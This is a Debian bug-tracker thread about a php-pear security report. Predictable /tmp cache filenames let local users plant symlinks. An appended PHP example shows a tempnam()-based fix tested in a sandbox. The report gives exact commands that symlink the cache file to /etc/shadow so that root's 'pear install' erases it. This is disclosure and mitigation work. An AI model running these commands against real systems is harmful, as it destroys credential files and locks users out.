Control: forcemerge -1 682157

Yes, it's a known bug that php-pear is not safe on multiuser systems.

Ondrej

On Mon, Aug 25, 2014, at 21:28, vladz wrote:
> Package: php-pear
> Version: 5.4.4-14+deb7u14
> Tags: security
>
> PEAR commands such as "pear install [...]" write cache data into
> predictable filenames located in "/tmp/". Unprivileged local users
> could use symlinks to clobber arbitrary files.
>
> Temporary filenames ("$cachefile" and "$cacheidfile") are generated with
> the code above. They are predictable as far as we know the extension
> name that is going to be installed (this name is used to construct the
> url for the MD5 checksum):
>
>   $ cat -n /usr/share/php/PEAR/REST.php
>   [...]
>     59  $cachefile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
>     60      md5($url) . 'rest.cachefile';
>   [...]
>    194  $cacheidfile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
>    195      md5($url) . 'rest.cacheid';
>
> For instance, when installing the "Mail_mime" extension, the following
> filenames are used by PEAR:
>
>   - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
>   - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid
>
> In this case, the "$url" used for md5 checksum is the following:
>
>   $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum
>   ff051dc5b96c95bf60e300d415b6c47e  -
>
> To sum up, if a local user wants to clobber the "/etc/shadow" file, he
> runs:
>
>   $ mkdir -p /tmp/pear/cache/
>   $ ln -s /etc/shadow /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
>
> Then when root runs PEAR, the file gets clobbered:
>
>   # pear install Mail_mime
>   [...]
>   # du -sk /etc/shadow
>   0       /etc/shadow
>
> A function like tempnam() could be used instead. It creates a file with
> a unique filename (see http://php.net/manual/en/function.tempnam.php).
>
> Regards,
> --
> http://vladz.devzero.fr
> PGP key 8F7E2D3C from pgp.mit.edu

--
Ondřej Surý <ond...@sury.org>
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server
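
The tempnam() suggestion from the report, shown beside the predictable-name write it would replace. This is an added example, not code from the thread or from PEAR; the function names and the sandbox directory are hypothetical, and the "victim" file is a constructed stand-in inside that sandbox.

```php
<?php
// Added example (not PEAR code). Function names and sandbox paths are hypothetical.

// Pattern from the report: predictable name, and the write follows a symlink.
function write_cache_predictable(string $cacheDir, string $url, string $data): void
{
    $cachefile = $cacheDir . DIRECTORY_SEPARATOR . md5($url) . 'rest.cachefile';
    file_put_contents($cachefile, $data);
}

// Hardened: create a unique file with tempnam(), then rename() it into place.
// rename() replaces a symlink at the destination instead of writing through it.
function write_cache_atomic(string $cacheDir, string $url, string $data): void
{
    $cachefile = $cacheDir . DIRECTORY_SEPARATOR . md5($url) . 'rest.cachefile';
    $tmp = tempnam($cacheDir, 'rest');
    // tempnam() falls back to the system temp dir if $cacheDir is unusable.
    if ($tmp === false || realpath(dirname($tmp)) !== realpath($cacheDir)) {
        if ($tmp !== false) { unlink($tmp); }
        throw new RuntimeException("cannot create temp file in $cacheDir");
    }
    if (file_put_contents($tmp, $data) === false || !rename($tmp, $cachefile)) {
        @unlink($tmp);
        throw new RuntimeException("cannot write $cachefile");
    }
}

// Constructed sandbox: a private directory with a stand-in "victim" file.
$sandbox  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pear-demo-' . bin2hex(random_bytes(6));
$cacheDir = $sandbox . DIRECTORY_SEPARATOR . 'cache';
mkdir($cacheDir, 0700, true);
$victim = $sandbox . DIRECTORY_SEPARATOR . 'victim.txt';
$url    = 'http://pear.php.net/rest/p/mail_mime/info.xml';
$link   = $cacheDir . DIRECTORY_SEPARATOR . md5($url) . 'rest.cachefile';

foreach (['write_cache_predictable', 'write_cache_atomic'] as $writer) {
    file_put_contents($victim, "important\n");
    @unlink($link);
    symlink($victim, $link);            // pre-planted link, as in the report
    $writer($cacheDir, $url, "cached response\n");
    printf("%-24s victim %s, cache entry is %s\n", $writer,
        file_get_contents($victim) === "important\n" ? 'intact' : 'overwritten',
        is_link($link) ? 'a symlink' : 'a regular file');
}
```

The directory matters as much as the filename: a cache directory under `/tmp` can be pre-created by another local user, so `cache_dir` should point at a location only the invoking user can write.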